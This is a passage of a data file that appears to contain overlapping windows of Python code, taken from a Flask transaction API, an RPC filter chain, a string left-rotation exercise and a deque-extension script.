"e: trans_dao._conn.rollback() abort(500, str(e)) return [ { 'trans_id': row[0], 'time': row[1].strftime('%Y-%m-%d %H:%M:%S'), 'cashier_id':",
"detail_dao.fill(trans_id, trans_items, cur): conn.rollback() abort(500, message='Error occured while filling ' 'transaction details!') #",
"3: return { 'merch_id': merch_id, 'reason': 'Illegal ID' }, 406 if ret ==",
"(start, count) else: value = (start,) with trans_dao._conn.cursor() as cur: try: cur.execute(sql, value)",
"data: return { 'reason': 'cashier, trans data must be given!' }, 406 cashier,",
"message='Error occured while filling ' 'transaction details!') # get sum of current transaction",
"D from db import MerchandiseDao, TransactionDao, TransDetailDao, EmployeeDao from db import ShiftsDao, VIPTransRecordDao",
"detail_dao.get_sum(trans_id, cur) if trans_sum is None: conn.rollback() abort(500) # update VIP card info",
"[ { 'trans_id': row[0], 'time': row[1].strftime('%Y-%m-%d %H:%M:%S'), 'cashier_id': row[2], 'cashier_login': row[3], 'sum': float(row[4])",
"transaction details if detail_dao.fill(trans_id, trans_items, cur): conn.rollback() abort(500, message='Error occured while filling '",
"of current transaction trans_sum = detail_dao.get_sum(trans_id, cur) if trans_sum is None: conn.rollback() abort(500)",
"-*- coding: utf-8 -*- from flask import request from flask_restful import Resource from",
"abort(500, message=f'Unknown error at consume(): {ret}.') # fill transaction details if detail_dao.fill(trans_id, trans_items,",
"as orig_price, D.`count` from `{merch_dao._table}` as M, `{detail_dao._table}` as D where D.`trans_id` =",
"ret == 2: return { 'merch_id': merch_id, 'reason': 'UPDATE finished with error' },",
"* D.`count`) from `{trans_dao._table}` as T, `{employ_dao._table}` as E, `{detail_dao._table}` as D where",
"# -*- coding: utf-8 -*- from flask import request from flask_restful import Resource",
"details!') # get sum of current transaction trans_sum = detail_dao.get_sum(trans_id, cur) if trans_sum",
"`{employ_dao._table}` as E, `{detail_dao._table}` as D where T.`id` >= %s and T.`cashier` =",
"Resource from flask_restful import abort import decimal as D from db import MerchandiseDao,",
"not in data or 'trans' not in data: return { 'reason': 'cashier, trans",
"timeout' }, 406 abort(500, message='Unknown error at VIPTransRecordDao' f'.transact_db(): {ret}.') # update shifts",
"conn.commit() except Exception as e: conn.rollback() abort(500, message=str(e)) return '', 200 class TransDetailApi(Resource):",
"T, `{employ_dao._table}` as E, `{detail_dao._table}` as D where T.`id` >= %s and T.`cashier`",
"'reason': 'Not enough in storage' }, 406 if ret == 2: return {",
"= trans_dao.start(cashier, cur) # create transaction master record if trans_id < 0: conn.rollback()",
"'vip_id': vip_id, 'reason': 'Invalid VIP ID' }, 406 if ret == 2: return",
"== 2: return { 'vip_id': vip_id, 'reason': 'VIP card timeout' }, 406 abort(500,",
"float, count: int], ... ] } ''' data = request.get_json() if 'cashier' not",
"as cur: try: cur.execute(sql, value) result = [row for row in cur] trans_dao._conn.commit()",
"= D.`merch_id` ''' value = (trans_id,) with detail_dao._conn.cursor() as cur: try: cur.execute(sql, value)",
"trans_dao = TransactionDao() detail_dao = TransDetailDao() employ_dao = EmployeeDao() shift_dao = ShiftsDao() viprec_dao",
"D.`count` from `{merch_dao._table}` as M, `{detail_dao._table}` as D where D.`trans_id` = %s and",
"VIPTransRecordDao() class TransactionApi(Resource): @auth.login_required def get(self, start: int, count: int): ''' Arguments ---------",
"conn = trans_dao._conn with conn.cursor() as cur: try: trans_id = trans_dao.start(cashier, cur) #",
"= [row for row in cur] trans_dao._conn.commit() except Exception as e: trans_dao._conn.rollback() abort(500,",
"ret == 1: return { 'merch_id': merch_id, 'reason': 'Not enough in storage' },",
"conn.rollback() abort(500, message='Failed to start transaction!') # consume stored merchandise for merch_id, _,",
"'merch_id': merch_id, 'reason': 'UPDATE finished with error' }, 406 abort(500, message=f'Unknown error at",
"'cashier_id': row[2], 'cashier_login': row[3], 'sum': float(row[4]) } for row in result ], 200",
"if 'cashier' not in data or 'trans' not in data: return { 'reason':",
"in result ], 200 @auth.login_required def post(self): ''' JSON data format: { 'vip_id':",
"as D where D.`trans_id` = %s and M.`id` = D.`merch_id` ''' value =",
"] } ''' data = request.get_json() if 'cashier' not in data or 'trans'",
"in cur] trans_dao._conn.commit() except Exception as e: trans_dao._conn.rollback() abort(500, str(e)) return [ {",
"for merch_id, _, count in trans_items: ret = merch_dao.consume(merch_id, count, cur) if ret:",
"import ShiftsDao, VIPTransRecordDao from .Auth import auth merch_dao = MerchandiseDao() trans_dao = TransactionDao()",
"'Illegal ID' }, 406 if ret == 1: return { 'merch_id': merch_id, 'reason':",
"M.`price` as orig_price, D.`count` from `{merch_dao._table}` as M, `{detail_dao._table}` as D where D.`trans_id`",
"coding: utf-8 -*- from flask import request from flask_restful import Resource from flask_restful",
"try: trans_id = trans_dao.start(cashier, cur) # create transaction master record if trans_id <",
"sql = f''' select T.`id`, T.`time`, T.`cashier`, E.`login`, sum(D.`price` * D.`count`) from `{trans_dao._table}`",
"storage' }, 406 if ret == 2: return { 'merch_id': merch_id, 'reason': 'UPDATE",
"if shift_dao.transact_cb(cashier, trans_sum, cur): conn.rollback() return { 'reason': f'Employee {cashier} not logged in!'",
"occured while filling ' 'transaction details!') # get sum of current transaction trans_sum",
"ID {cashier} is illegal!' }, 406 conn = trans_dao._conn with conn.cursor() as cur:",
"if 'vip_id' in data else None if not employ_dao.has_id(cashier): return { 'reason': f'Cashier",
"get sum of current transaction trans_sum = detail_dao.get_sum(trans_id, cur) if trans_sum is None:",
"as D from db import MerchandiseDao, TransactionDao, TransDetailDao, EmployeeDao from db import ShiftsDao,",
"T.`time`, T.`cashier`, E.`login`, sum(D.`price` * D.`count`) from `{trans_dao._table}` as T, `{employ_dao._table}` as E,",
"cur) if ret != 0 and ret != 1: conn.rollback() if ret ==",
"If <= 0, return all rows. ''' sql = f''' select T.`id`, T.`time`,",
"merch_dao = MerchandiseDao() trans_dao = TransactionDao() detail_dao = TransDetailDao() employ_dao = EmployeeDao() shift_dao",
"in!' }, 406 conn.commit() except Exception as e: conn.rollback() abort(500, message=str(e)) return '',",
"ret != 0 and ret != 1: conn.rollback() if ret == -1: return",
"T.`cashier` = E.`id` and T.`id` = D.`trans_id` group by T.`id` order by T.`time`",
"' 'transaction details!') # get sum of current transaction trans_sum = detail_dao.get_sum(trans_id, cur)",
"cur) if trans_sum is None: conn.rollback() abort(500) # update VIP card info if",
"conn.rollback() abort(500, message=str(e)) return '', 200 class TransDetailApi(Resource): @auth.login_required def get(self, trans_id: int):",
"ShiftsDao, VIPTransRecordDao from .Auth import auth merch_dao = MerchandiseDao() trans_dao = TransactionDao() detail_dao",
"row in cur] trans_dao._conn.commit() except Exception as e: trans_dao._conn.rollback() abort(500, str(e)) return [",
"'cashier' not in data or 'trans' not in data: return { 'reason': 'cashier,",
"}, 406 abort(500, message='Unknown error at VIPTransRecordDao' f'.transact_db(): {ret}.') # update shifts info",
"not employ_dao.has_id(cashier): return { 'reason': f'Cashier ID {cashier} is illegal!' }, 406 conn",
"conn.rollback() return { 'reason': f'Employee {cashier} not logged in!' }, 406 conn.commit() except",
"ret == 2: return { 'vip_id': vip_id, 'reason': 'VIP card timeout' }, 406",
"create transaction master record if trans_id < 0: conn.rollback() abort(500, message='Failed to start",
"sum(D.`price` * D.`count`) from `{trans_dao._table}` as T, `{employ_dao._table}` as E, `{detail_dao._table}` as D",
"merch_id, 'reason': 'Illegal ID' }, 406 if ret == 1: return { 'merch_id':",
"conn.rollback() abort(500) # update VIP card info if vip_id is not None: ret",
"detail_dao = TransDetailDao() employ_dao = EmployeeDao() shift_dao = ShiftsDao() viprec_dao = VIPTransRecordDao() class",
"# fill transaction details if detail_dao.fill(trans_id, trans_items, cur): conn.rollback() abort(500, message='Error occured while",
"stored merchandise for merch_id, _, count in trans_items: ret = merch_dao.consume(merch_id, count, cur)",
"to start transaction!') # consume stored merchandise for merch_id, _, count in trans_items:",
"= E.`id` and T.`id` = D.`trans_id` group by T.`id` order by T.`time` desc",
"start transaction!') # consume stored merchandise for merch_id, _, count in trans_items: ret",
"= viprec_dao.transact_cb(vip_id, trans_sum, cur) if ret != 0 and ret != 1: conn.rollback()",
"def get(self, trans_id: int): sql = f''' select D.`merch_id`, M.`name`, D.`price`, M.`price` as",
"import request from flask_restful import Resource from flask_restful import abort import decimal as",
"count) else: value = (start,) with trans_dao._conn.cursor() as cur: try: cur.execute(sql, value) result",
"abort(500, message=str(e)) return '', 200 class TransDetailApi(Resource): @auth.login_required def get(self, trans_id: int): sql",
"T.`time` desc ''' if count > 0: sql += ' limit %s' value",
"order by T.`time` desc ''' if count > 0: sql += ' limit",
"cur.execute(sql, value) result = [row for row in cur] trans_dao._conn.commit() except Exception as",
"E.`login`, sum(D.`price` * D.`count`) from `{trans_dao._table}` as T, `{employ_dao._table}` as E, `{detail_dao._table}` as",
"== -1: return { 'vip_id': vip_id, 'reason': 'Invalid VIP ID' }, 406 if"
] |
[
"executer: Executer) -> Executer: filters = self.context.url.get_param(\"filters\", []) for cls in reversed([import_string(f) for",
"context: Any): self.context = context def then(self, executer: Executer) -> Executer: filters =",
"gevent.monkey import patch_thread # type: ignore from doge.common.doge import Executer, Request, Response from",
"Any, _next: Executer): self.next = _next def execute(self, req: Request) -> Response: return",
"Any from gevent.monkey import patch_thread # type: ignore from doge.common.doge import Executer, Request,",
"execute(self, req: Request) -> Response: return self.next.execute(req) class FilterChain: def __init__(self, context: Any):",
"Executer, Request, Response from doge.common.utils import import_string patch_thread() class BaseFilter(Executer): def __init__(self, context:",
"import patch_thread # type: ignore from doge.common.doge import Executer, Request, Response from doge.common.utils",
"= _next def execute(self, req: Request) -> Response: return self.next.execute(req) class FilterChain: def",
"-> Response: return self.next.execute(req) class FilterChain: def __init__(self, context: Any): self.context = context",
"type: ignore from doge.common.doge import Executer, Request, Response from doge.common.utils import import_string patch_thread()",
"context: Any, _next: Executer): self.next = _next def execute(self, req: Request) -> Response:",
"import import_string patch_thread() class BaseFilter(Executer): def __init__(self, context: Any, _next: Executer): self.next =",
"= context def then(self, executer: Executer) -> Executer: filters = self.context.url.get_param(\"filters\", []) for",
"context def then(self, executer: Executer) -> Executer: filters = self.context.url.get_param(\"filters\", []) for cls",
"doge.common.doge import Executer, Request, Response from doge.common.utils import import_string patch_thread() class BaseFilter(Executer): def",
"def __init__(self, context: Any): self.context = context def then(self, executer: Executer) -> Executer:",
"import Any from gevent.monkey import patch_thread # type: ignore from doge.common.doge import Executer,",
"class FilterChain: def __init__(self, context: Any): self.context = context def then(self, executer: Executer)",
"def __init__(self, context: Any, _next: Executer): self.next = _next def execute(self, req: Request)",
"Request) -> Response: return self.next.execute(req) class FilterChain: def __init__(self, context: Any): self.context =",
"req: Request) -> Response: return self.next.execute(req) class FilterChain: def __init__(self, context: Any): self.context",
"Any): self.context = context def then(self, executer: Executer) -> Executer: filters = self.context.url.get_param(\"filters\",",
"def then(self, executer: Executer) -> Executer: filters = self.context.url.get_param(\"filters\", []) for cls in",
"_next: Executer): self.next = _next def execute(self, req: Request) -> Response: return self.next.execute(req)",
"__init__(self, context: Any): self.context = context def then(self, executer: Executer) -> Executer: filters",
"self.next.execute(req) class FilterChain: def __init__(self, context: Any): self.context = context def then(self, executer:",
"self.context = context def then(self, executer: Executer) -> Executer: filters = self.context.url.get_param(\"filters\", [])",
"from typing import Any from gevent.monkey import patch_thread # type: ignore from doge.common.doge",
"Executer: filters = self.context.url.get_param(\"filters\", []) for cls in reversed([import_string(f) for f in filters]):",
"= self.context.url.get_param(\"filters\", []) for cls in reversed([import_string(f) for f in filters]): executer =",
"import_string patch_thread() class BaseFilter(Executer): def __init__(self, context: Any, _next: Executer): self.next = _next",
"self.context.url.get_param(\"filters\", []) for cls in reversed([import_string(f) for f in filters]): executer = cls(self.context,",
"cls in reversed([import_string(f) for f in filters]): executer = cls(self.context, executer) return executer",
"patch_thread # type: ignore from doge.common.doge import Executer, Request, Response from doge.common.utils import",
"FilterChain: def __init__(self, context: Any): self.context = context def then(self, executer: Executer) ->",
"ignore from doge.common.doge import Executer, Request, Response from doge.common.utils import import_string patch_thread() class",
"patch_thread() class BaseFilter(Executer): def __init__(self, context: Any, _next: Executer): self.next = _next def",
"Response: return self.next.execute(req) class FilterChain: def __init__(self, context: Any): self.context = context def",
"-> Executer: filters = self.context.url.get_param(\"filters\", []) for cls in reversed([import_string(f) for f in",
"for cls in reversed([import_string(f) for f in filters]): executer = cls(self.context, executer) return",
"[]) for cls in reversed([import_string(f) for f in filters]): executer = cls(self.context, executer)",
"self.next = _next def execute(self, req: Request) -> Response: return self.next.execute(req) class FilterChain:",
"Request, Response from doge.common.utils import import_string patch_thread() class BaseFilter(Executer): def __init__(self, context: Any,",
"Response from doge.common.utils import import_string patch_thread() class BaseFilter(Executer): def __init__(self, context: Any, _next:",
"def execute(self, req: Request) -> Response: return self.next.execute(req) class FilterChain: def __init__(self, context:",
"return self.next.execute(req) class FilterChain: def __init__(self, context: Any): self.context = context def then(self,",
"import Executer, Request, Response from doge.common.utils import import_string patch_thread() class BaseFilter(Executer): def __init__(self,",
"_next def execute(self, req: Request) -> Response: return self.next.execute(req) class FilterChain: def __init__(self,",
"# type: ignore from doge.common.doge import Executer, Request, Response from doge.common.utils import import_string",
"from doge.common.utils import import_string patch_thread() class BaseFilter(Executer): def __init__(self, context: Any, _next: Executer):",
"from gevent.monkey import patch_thread # type: ignore from doge.common.doge import Executer, Request, Response",
"__init__(self, context: Any, _next: Executer): self.next = _next def execute(self, req: Request) ->",
"from doge.common.doge import Executer, Request, Response from doge.common.utils import import_string patch_thread() class BaseFilter(Executer):",
"Executer): self.next = _next def execute(self, req: Request) -> Response: return self.next.execute(req) class",
"doge.common.utils import import_string patch_thread() class BaseFilter(Executer): def __init__(self, context: Any, _next: Executer): self.next",
"BaseFilter(Executer): def __init__(self, context: Any, _next: Executer): self.next = _next def execute(self, req:",
"class BaseFilter(Executer): def __init__(self, context: Any, _next: Executer): self.next = _next def execute(self,",
"then(self, executer: Executer) -> Executer: filters = self.context.url.get_param(\"filters\", []) for cls in reversed([import_string(f)",
"typing import Any from gevent.monkey import patch_thread # type: ignore from doge.common.doge import",
"filters = self.context.url.get_param(\"filters\", []) for cls in reversed([import_string(f) for f in filters]): executer",
"Executer) -> Executer: filters = self.context.url.get_param(\"filters\", []) for cls in reversed([import_string(f) for f"
] |
[
"== 0: return None if n < 0 or n >len(string): return None",
"= n - 1 end = len(string) - 1 __reverse(str_arr, begin, div) __reverse(str_arr,",
"1 end = len(string) - 1 __reverse(str_arr, begin, div) __reverse(str_arr, div+1, end) __reverse(str_arr,",
"str_arr[begin] begin += 1 end -= 1 if __name__ == \"__main__\": string =",
"__name__ == \"__main__\": string = 'abcdefg' rotate = 2 print('\"%s\" left rotate %d:",
"def __reverse(str_arr, begin, end): while begin < end: str_arr[begin], str_arr[end] = str_arr[end], str_arr[begin]",
"string is None or len(string) == 0: return None if n < 0",
"1 end -= 1 if __name__ == \"__main__\": string = 'abcdefg' rotate =",
"n >len(string): return None str_arr = [x for x in string] begin =",
"left_rotate(string, n): if string is None or len(string) == 0: return None if",
"1 __reverse(str_arr, begin, div) __reverse(str_arr, div+1, end) __reverse(str_arr, begin, end) return ''.join(str_arr) def",
"__reverse(str_arr, div+1, end) __reverse(str_arr, begin, end) return ''.join(str_arr) def __reverse(str_arr, begin, end): while",
"请定义一个函数实现字符串左旋转操作的功能。 --------------- input: abcdefg 2 output: cdefgab ''' def left_rotate(string, n): if string",
"end) __reverse(str_arr, begin, end) return ''.join(str_arr) def __reverse(str_arr, begin, end): while begin <",
"begin += 1 end -= 1 if __name__ == \"__main__\": string = 'abcdefg'",
"< end: str_arr[begin], str_arr[end] = str_arr[end], str_arr[begin] begin += 1 end -= 1",
"< 0 or n >len(string): return None str_arr = [x for x in",
"= str_arr[end], str_arr[begin] begin += 1 end -= 1 if __name__ == \"__main__\":",
"output: cdefgab ''' def left_rotate(string, n): if string is None or len(string) ==",
"def left_rotate(string, n): if string is None or len(string) == 0: return None",
"if n < 0 or n >len(string): return None str_arr = [x for",
"0 or n >len(string): return None str_arr = [x for x in string]",
"end = len(string) - 1 __reverse(str_arr, begin, div) __reverse(str_arr, div+1, end) __reverse(str_arr, begin,",
"__reverse(str_arr, begin, end) return ''.join(str_arr) def __reverse(str_arr, begin, end): while begin < end:",
"or n >len(string): return None str_arr = [x for x in string] begin",
"if __name__ == \"__main__\": string = 'abcdefg' rotate = 2 print('\"%s\" left rotate",
"= [x for x in string] begin = 0 div = n -",
"0 div = n - 1 end = len(string) - 1 __reverse(str_arr, begin,",
"end): while begin < end: str_arr[begin], str_arr[end] = str_arr[end], str_arr[begin] begin += 1",
"end) return ''.join(str_arr) def __reverse(str_arr, begin, end): while begin < end: str_arr[begin], str_arr[end]",
"0: return None if n < 0 or n >len(string): return None str_arr",
"= 'abcdefg' rotate = 2 print('\"%s\" left rotate %d: %s' % (string, rotate,",
"字符串的左旋转操作是把字符串前面的若干个字符转移到字符串的尾部。 请定义一个函数实现字符串左旋转操作的功能。 --------------- input: abcdefg 2 output: cdefgab ''' def left_rotate(string, n): if",
"for x in string] begin = 0 div = n - 1 end",
"len(string) - 1 __reverse(str_arr, begin, div) __reverse(str_arr, div+1, end) __reverse(str_arr, begin, end) return",
"in string] begin = 0 div = n - 1 end = len(string)",
"== \"__main__\": string = 'abcdefg' rotate = 2 print('\"%s\" left rotate %d: %s'",
"is None or len(string) == 0: return None if n < 0 or",
"-= 1 if __name__ == \"__main__\": string = 'abcdefg' rotate = 2 print('\"%s\"",
"while begin < end: str_arr[begin], str_arr[end] = str_arr[end], str_arr[begin] begin += 1 end",
"None str_arr = [x for x in string] begin = 0 div =",
"begin = 0 div = n - 1 end = len(string) - 1",
"abcdefg 2 output: cdefgab ''' def left_rotate(string, n): if string is None or",
"end: str_arr[begin], str_arr[end] = str_arr[end], str_arr[begin] begin += 1 end -= 1 if",
"None or len(string) == 0: return None if n < 0 or n",
"str_arr[begin], str_arr[end] = str_arr[end], str_arr[begin] begin += 1 end -= 1 if __name__",
"div+1, end) __reverse(str_arr, begin, end) return ''.join(str_arr) def __reverse(str_arr, begin, end): while begin",
"begin < end: str_arr[begin], str_arr[end] = str_arr[end], str_arr[begin] begin += 1 end -=",
"n < 0 or n >len(string): return None str_arr = [x for x",
"= len(string) - 1 __reverse(str_arr, begin, div) __reverse(str_arr, div+1, end) __reverse(str_arr, begin, end)",
"if string is None or len(string) == 0: return None if n <",
"return ''.join(str_arr) def __reverse(str_arr, begin, end): while begin < end: str_arr[begin], str_arr[end] =",
"div) __reverse(str_arr, div+1, end) __reverse(str_arr, begin, end) return ''.join(str_arr) def __reverse(str_arr, begin, end):",
"x in string] begin = 0 div = n - 1 end =",
"str_arr = [x for x in string] begin = 0 div = n",
"rotate = 2 print('\"%s\" left rotate %d: %s' % (string, rotate, left_rotate(string, rotate)))",
"return None str_arr = [x for x in string] begin = 0 div",
"begin, end) return ''.join(str_arr) def __reverse(str_arr, begin, end): while begin < end: str_arr[begin],",
"__reverse(str_arr, begin, div) __reverse(str_arr, div+1, end) __reverse(str_arr, begin, end) return ''.join(str_arr) def __reverse(str_arr,",
"div = n - 1 end = len(string) - 1 __reverse(str_arr, begin, div)",
"'abcdefg' rotate = 2 print('\"%s\" left rotate %d: %s' % (string, rotate, left_rotate(string,",
"\"__main__\": string = 'abcdefg' rotate = 2 print('\"%s\" left rotate %d: %s' %",
"= 0 div = n - 1 end = len(string) - 1 __reverse(str_arr,",
"- 1 __reverse(str_arr, begin, div) __reverse(str_arr, div+1, end) __reverse(str_arr, begin, end) return ''.join(str_arr)",
"begin, div) __reverse(str_arr, div+1, end) __reverse(str_arr, begin, end) return ''.join(str_arr) def __reverse(str_arr, begin,",
"string] begin = 0 div = n - 1 end = len(string) -",
"--------------- input: abcdefg 2 output: cdefgab ''' def left_rotate(string, n): if string is",
"begin, end): while begin < end: str_arr[begin], str_arr[end] = str_arr[end], str_arr[begin] begin +=",
"or len(string) == 0: return None if n < 0 or n >len(string):",
"string = 'abcdefg' rotate = 2 print('\"%s\" left rotate %d: %s' % (string,",
"str_arr[end] = str_arr[end], str_arr[begin] begin += 1 end -= 1 if __name__ ==",
"2 output: cdefgab ''' def left_rotate(string, n): if string is None or len(string)",
"return None if n < 0 or n >len(string): return None str_arr =",
"n): if string is None or len(string) == 0: return None if n",
"str_arr[end], str_arr[begin] begin += 1 end -= 1 if __name__ == \"__main__\": string",
"n - 1 end = len(string) - 1 __reverse(str_arr, begin, div) __reverse(str_arr, div+1,",
"len(string) == 0: return None if n < 0 or n >len(string): return",
"1 if __name__ == \"__main__\": string = 'abcdefg' rotate = 2 print('\"%s\" left",
"None if n < 0 or n >len(string): return None str_arr = [x",
"''' def left_rotate(string, n): if string is None or len(string) == 0: return",
"end -= 1 if __name__ == \"__main__\": string = 'abcdefg' rotate = 2",
"__reverse(str_arr, begin, end): while begin < end: str_arr[begin], str_arr[end] = str_arr[end], str_arr[begin] begin",
"cdefgab ''' def left_rotate(string, n): if string is None or len(string) == 0:",
"''.join(str_arr) def __reverse(str_arr, begin, end): while begin < end: str_arr[begin], str_arr[end] = str_arr[end],",
"+= 1 end -= 1 if __name__ == \"__main__\": string = 'abcdefg' rotate",
"'''面试题58-2:左旋转字符串 字符串的左旋转操作是把字符串前面的若干个字符转移到字符串的尾部。 请定义一个函数实现字符串左旋转操作的功能。 --------------- input: abcdefg 2 output: cdefgab ''' def left_rotate(string, n):",
"[x for x in string] begin = 0 div = n - 1",
"input: abcdefg 2 output: cdefgab ''' def left_rotate(string, n): if string is None",
"- 1 end = len(string) - 1 __reverse(str_arr, begin, div) __reverse(str_arr, div+1, end)",
">len(string): return None str_arr = [x for x in string] begin = 0"
] |
[
"max_ext < 0: raise ValueError(f'Invalid max size ({max_ext}) for deque') return source_deque.extend([randint(0, max_ext)",
"# object. # # Program Author : <NAME> <<EMAIL>> # # Creation Date",
"randint from collections import deque def create_random_deque(low: int, high: int, size: int) ->",
"Program purpose: Adds more number of elements to a deque object from an",
"ValueError(f'Invalid size ({size}) for new deque') return deque([randint(low, high) for _ in range(size)])",
"python3 ############################################################################################ # # # Program purpose: Adds more number of elements to",
"= create_random_deque(low=0, high=20, size=5) print(f'New deque: {new_deque}') # Extend deque with 5 random",
"== \"__main__\": new_deque = create_random_deque(low=0, high=20, size=5) print(f'New deque: {new_deque}') # Extend deque",
"# # Program purpose: Adds more number of elements to a deque object",
"Author : <NAME> <<EMAIL>> # # Creation Date : December 27, 2019 #",
"int) -> deque: if size < 0: raise ValueError(f'Invalid size ({size}) for new",
"({size}) for new deque') return deque([randint(low, high) for _ in range(size)]) def add_nums_to_deque(source_deque:",
"deque object from an iterable # # object. # # Program Author :",
"a deque object from an iterable # # object. # # Program Author",
"object. # # Program Author : <NAME> <<EMAIL>> # # Creation Date :",
"more number of elements to a deque object from an iterable # #",
"print(f'New deque: {new_deque}') # Extend deque with 5 random data. add_nums_to_deque(source_deque=new_deque, max_ext=5) print(f'Extended",
"# # Creation Date : December 27, 2019 # # # ############################################################################################ from",
"{new_deque}') # Extend deque with 5 random data. add_nums_to_deque(source_deque=new_deque, max_ext=5) print(f'Extended deque: {new_deque}')",
"deque, max_ext: int) -> None: if max_ext < 0: raise ValueError(f'Invalid max size",
"<<EMAIL>> # # Creation Date : December 27, 2019 # # # ############################################################################################",
"({max_ext}) for deque') return source_deque.extend([randint(0, max_ext) for _ in range(max_ext)]) if __name__ ==",
"purpose: Adds more number of elements to a deque object from an iterable",
"for _ in range(max_ext)]) if __name__ == \"__main__\": new_deque = create_random_deque(low=0, high=20, size=5)",
"max_ext: int) -> None: if max_ext < 0: raise ValueError(f'Invalid max size ({max_ext})",
"############################################################################################ from random import randint from collections import deque def create_random_deque(low: int, high:",
"\"__main__\": new_deque = create_random_deque(low=0, high=20, size=5) print(f'New deque: {new_deque}') # Extend deque with",
"new_deque = create_random_deque(low=0, high=20, size=5) print(f'New deque: {new_deque}') # Extend deque with 5",
"iterable # # object. # # Program Author : <NAME> <<EMAIL>> # #",
"None: if max_ext < 0: raise ValueError(f'Invalid max size ({max_ext}) for deque') return",
"if __name__ == \"__main__\": new_deque = create_random_deque(low=0, high=20, size=5) print(f'New deque: {new_deque}') #",
"# ############################################################################################ from random import randint from collections import deque def create_random_deque(low: int,",
"_ in range(max_ext)]) if __name__ == \"__main__\": new_deque = create_random_deque(low=0, high=20, size=5) print(f'New",
"Program Author : <NAME> <<EMAIL>> # # Creation Date : December 27, 2019",
"import randint from collections import deque def create_random_deque(low: int, high: int, size: int)",
"elements to a deque object from an iterable # # object. # #",
"max size ({max_ext}) for deque') return source_deque.extend([randint(0, max_ext) for _ in range(max_ext)]) if",
"size: int) -> deque: if size < 0: raise ValueError(f'Invalid size ({size}) for",
"December 27, 2019 # # # ############################################################################################ from random import randint from collections",
"deque: if size < 0: raise ValueError(f'Invalid size ({size}) for new deque') return",
"create_random_deque(low: int, high: int, size: int) -> deque: if size < 0: raise",
"<NAME> <<EMAIL>> # # Creation Date : December 27, 2019 # # #",
"from random import randint from collections import deque def create_random_deque(low: int, high: int,",
"deque: {new_deque}') # Extend deque with 5 random data. add_nums_to_deque(source_deque=new_deque, max_ext=5) print(f'Extended deque:",
"for _ in range(size)]) def add_nums_to_deque(source_deque: deque, max_ext: int) -> None: if max_ext",
"from an iterable # # object. # # Program Author : <NAME> <<EMAIL>>",
"range(size)]) def add_nums_to_deque(source_deque: deque, max_ext: int) -> None: if max_ext < 0: raise",
"0: raise ValueError(f'Invalid max size ({max_ext}) for deque') return source_deque.extend([randint(0, max_ext) for _",
"__name__ == \"__main__\": new_deque = create_random_deque(low=0, high=20, size=5) print(f'New deque: {new_deque}') # Extend",
"raise ValueError(f'Invalid size ({size}) for new deque') return deque([randint(low, high) for _ in",
"# # ############################################################################################ from random import randint from collections import deque def create_random_deque(low:",
"high=20, size=5) print(f'New deque: {new_deque}') # Extend deque with 5 random data. add_nums_to_deque(source_deque=new_deque,",
"Creation Date : December 27, 2019 # # # ############################################################################################ from random import",
"in range(size)]) def add_nums_to_deque(source_deque: deque, max_ext: int) -> None: if max_ext < 0:",
"# Program Author : <NAME> <<EMAIL>> # # Creation Date : December 27,",
"int, high: int, size: int) -> deque: if size < 0: raise ValueError(f'Invalid",
"return source_deque.extend([randint(0, max_ext) for _ in range(max_ext)]) if __name__ == \"__main__\": new_deque =",
"import deque def create_random_deque(low: int, high: int, size: int) -> deque: if size",
"add_nums_to_deque(source_deque: deque, max_ext: int) -> None: if max_ext < 0: raise ValueError(f'Invalid max",
"deque') return source_deque.extend([randint(0, max_ext) for _ in range(max_ext)]) if __name__ == \"__main__\": new_deque",
"def create_random_deque(low: int, high: int, size: int) -> deque: if size < 0:",
"size=5) print(f'New deque: {new_deque}') # Extend deque with 5 random data. add_nums_to_deque(source_deque=new_deque, max_ext=5)",
"max_ext) for _ in range(max_ext)]) if __name__ == \"__main__\": new_deque = create_random_deque(low=0, high=20,",
"deque([randint(low, high) for _ in range(size)]) def add_nums_to_deque(source_deque: deque, max_ext: int) -> None:",
"high: int, size: int) -> deque: if size < 0: raise ValueError(f'Invalid size",
"object from an iterable # # object. # # Program Author : <NAME>",
"source_deque.extend([randint(0, max_ext) for _ in range(max_ext)]) if __name__ == \"__main__\": new_deque = create_random_deque(low=0,",
"# # # Program purpose: Adds more number of elements to a deque",
"# # object. # # Program Author : <NAME> <<EMAIL>> # # Creation",
"27, 2019 # # # ############################################################################################ from random import randint from collections import",
"of elements to a deque object from an iterable # # object. #",
"size < 0: raise ValueError(f'Invalid size ({size}) for new deque') return deque([randint(low, high)",
"an iterable # # object. # # Program Author : <NAME> <<EMAIL>> #",
"# Program purpose: Adds more number of elements to a deque object from",
"new deque') return deque([randint(low, high) for _ in range(size)]) def add_nums_to_deque(source_deque: deque, max_ext:",
"# Creation Date : December 27, 2019 # # # ############################################################################################ from random",
"0: raise ValueError(f'Invalid size ({size}) for new deque') return deque([randint(low, high) for _",
"-> deque: if size < 0: raise ValueError(f'Invalid size ({size}) for new deque')",
"collections import deque def create_random_deque(low: int, high: int, size: int) -> deque: if",
"to a deque object from an iterable # # object. # # Program",
": <NAME> <<EMAIL>> # # Creation Date : December 27, 2019 # #",
"2019 # # # ############################################################################################ from random import randint from collections import deque",
"size ({size}) for new deque') return deque([randint(low, high) for _ in range(size)]) def",
"deque') return deque([randint(low, high) for _ in range(size)]) def add_nums_to_deque(source_deque: deque, max_ext: int)",
"if max_ext < 0: raise ValueError(f'Invalid max size ({max_ext}) for deque') return source_deque.extend([randint(0,",
"high) for _ in range(size)]) def add_nums_to_deque(source_deque: deque, max_ext: int) -> None: if",
"int) -> None: if max_ext < 0: raise ValueError(f'Invalid max size ({max_ext}) for",
"number of elements to a deque object from an iterable # # object.",
"if size < 0: raise ValueError(f'Invalid size ({size}) for new deque') return deque([randint(low,",
"#!/usr/bin/env python3 ############################################################################################ # # # Program purpose: Adds more number of elements",
"Date : December 27, 2019 # # # ############################################################################################ from random import randint",
"create_random_deque(low=0, high=20, size=5) print(f'New deque: {new_deque}') # Extend deque with 5 random data.",
"< 0: raise ValueError(f'Invalid max size ({max_ext}) for deque') return source_deque.extend([randint(0, max_ext) for",
"size ({max_ext}) for deque') return source_deque.extend([randint(0, max_ext) for _ in range(max_ext)]) if __name__",
"deque def create_random_deque(low: int, high: int, size: int) -> deque: if size <",
"return deque([randint(low, high) for _ in range(size)]) def add_nums_to_deque(source_deque: deque, max_ext: int) ->",
"raise ValueError(f'Invalid max size ({max_ext}) for deque') return source_deque.extend([randint(0, max_ext) for _ in",
"def add_nums_to_deque(source_deque: deque, max_ext: int) -> None: if max_ext < 0: raise ValueError(f'Invalid",
"int, size: int) -> deque: if size < 0: raise ValueError(f'Invalid size ({size})",
